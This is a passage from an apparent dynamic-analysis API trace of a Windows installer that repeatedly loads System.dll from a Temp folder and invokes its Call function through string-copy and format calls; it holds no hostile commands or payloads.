out: 
lpString1="*3314072(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3314072(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.043] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.043] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.043] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.043] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.044] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.044] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314072" | out: lpString1="3314072") returned="3314072" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.045] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.045] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="484") returned 3 [0158.045] lstrcpyA (in: lpString1=0x430800, lpString2="484" | out: lpString1="484") returned="484" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="656") returned 3 [0158.045] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3314072") returned 7 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: 
lpString1="1224") returned="1224" [0158.045] lstrlenA (lpString="1224") returned 4 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="484", iMaxLength=1024 | out: lpString1="484") returned="484" [0158.045] lstrlenA (lpString="484") returned 3 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="656", iMaxLength=1024 | out: lpString1="656") returned="656" [0158.045] lstrlenA (lpString="656") returned 3 [0158.045] lstrcpynA (in: lpString1=0x40ac18, lpString2="656", iMaxLength=1024 | out: lpString1="656") returned="656" [0158.045] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.045] lstrcmpiA (lpString1="656", lpString2="0") returned 1 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3314072", iMaxLength=1024 | out: lpString1="3314072") returned="3314072" [0158.046] lstrlenA (lpString="3314072") returned 7 [0158.046] lstrcpynA (in: lpString1=0x42e3a0, lpString2="656", iMaxLength=1024 | out: lpString1="656") returned="656" [0158.046] lstrlenA (lpString="656") returned 3 [0158.046] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3314728") returned 7 [0158.046] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.046] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.046] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.046] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.046] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3314728", iMaxLength=1024 | out: lpString1="3314728") returned="3314728" [0158.046] lstrlenA (lpString="3314728") returned 7 [0158.046] lstrcpynA (in: lpString1=0x336d34, lpString2="*3314728(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3314728(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3314728(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.046] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.046] lstrcpynA 
(in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.047] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.047] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.047] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314728" | out: lpString1="3314728") returned="3314728" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.048] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: 
param_1="492") returned 3 [0158.048] lstrcpyA (in: lpString1=0x430800, lpString2="492" | out: lpString1="492") returned="492" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="840") returned 3 [0158.048] lstrcpyA (in: lpString1=0x431000, lpString2="840" | out: lpString1="840") returned="840" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3314728") returned 7 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.049] lstrlenA (lpString="1224") returned 4 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="492", iMaxLength=1024 | out: lpString1="492") returned="492" [0158.049] lstrlenA (lpString="492") returned 3 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="840", iMaxLength=1024 | out: lpString1="840") returned="840" [0158.049] lstrlenA (lpString="840") returned 3 [0158.049] lstrcpynA (in: lpString1=0x40ac18, lpString2="840", iMaxLength=1024 | out: lpString1="840") returned="840" [0158.049] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.049] lstrcmpiA (lpString1="840", lpString2="0") returned 1 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3314728", iMaxLength=1024 | 
out: lpString1="3314728") returned="3314728" [0158.049] lstrlenA (lpString="3314728") returned 7 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="840", iMaxLength=1024 | out: lpString1="840") returned="840" [0158.049] lstrlenA (lpString="840") returned 3 [0158.049] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3315568") returned 7 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.049] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.049] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.049] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.049] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.049] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.050] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3315568", iMaxLength=1024 | out: lpString1="3315568") returned="3315568" [0158.050] lstrlenA (lpString="3315568") returned 7 [0158.050] lstrcpynA (in: lpString1=0x336d34, lpString2="*3315568(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3315568(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3315568(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.050] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.050] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.050] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.050] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.050] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.050] lstrcpyA (in: lpString1=0x321ba8, lpString2="3315568" | out: lpString1="3315568") returned="3315568" [0158.050] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.050] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.050] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.051] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="600") returned 3 [0158.051] lstrcpyA (in: lpString1=0x430800, lpString2="600" | out: lpString1="600") returned="600" [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.052] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.052] wsprintfA 
(in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.052] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="912") returned 3 [0158.052] lstrcpyA (in: lpString1=0x431000, lpString2="912" | out: lpString1="912") returned="912" [0158.052] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3315568") returned 7 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.052] lstrlenA (lpString="1224") returned 4 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="600", iMaxLength=1024 | out: lpString1="600") returned="600" [0158.052] lstrlenA (lpString="600") returned 3 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="912", iMaxLength=1024 | out: lpString1="912") returned="912" [0158.052] lstrlenA (lpString="912") returned 3 [0158.052] lstrcpynA (in: lpString1=0x40ac18, lpString2="912", iMaxLength=1024 | out: lpString1="912") returned="912" [0158.052] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.052] lstrcmpiA (lpString1="912", lpString2="0") returned 1 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3315568", iMaxLength=1024 | out: lpString1="3315568") returned="3315568" [0158.052] lstrlenA (lpString="3315568") returned 7 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="912", iMaxLength=1024 | out: lpString1="912") returned="912" [0158.052] lstrlenA (lpString="912") returned 3 [0158.052] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3316480") returned 7 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.052] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.052] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.052] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.053] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.053] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.053] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3316480", iMaxLength=1024 | out: lpString1="3316480") returned="3316480" [0158.053] lstrlenA (lpString="3316480") returned 7 [0158.053] lstrcpynA (in: lpString1=0x336d34, lpString2="*3316480(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3316480(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3316480(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.053] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.053] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.053] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.053] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.053] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.053] lstrcpyA (in: lpString1=0x321ba8, lpString2="3316480" | out: lpString1="3316480") returned="3316480" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] 
lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.054] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.054] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="664") returned 3 [0158.054] lstrcpyA (in: lpString1=0x430800, lpString2="664" | out: lpString1="664") returned="664" [0158.054] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="720") returned 3 [0158.055] lstrcpyA (in: lpString1=0x431000, lpString2="720" | out: lpString1="720") returned="720" [0158.056] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3316480") returned 7 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.056] lstrlenA (lpString="1224") returned 4 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="664", iMaxLength=1024 | out: lpString1="664") returned="664" [0158.056] lstrlenA (lpString="664") returned 3 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="720", iMaxLength=1024 | out: 
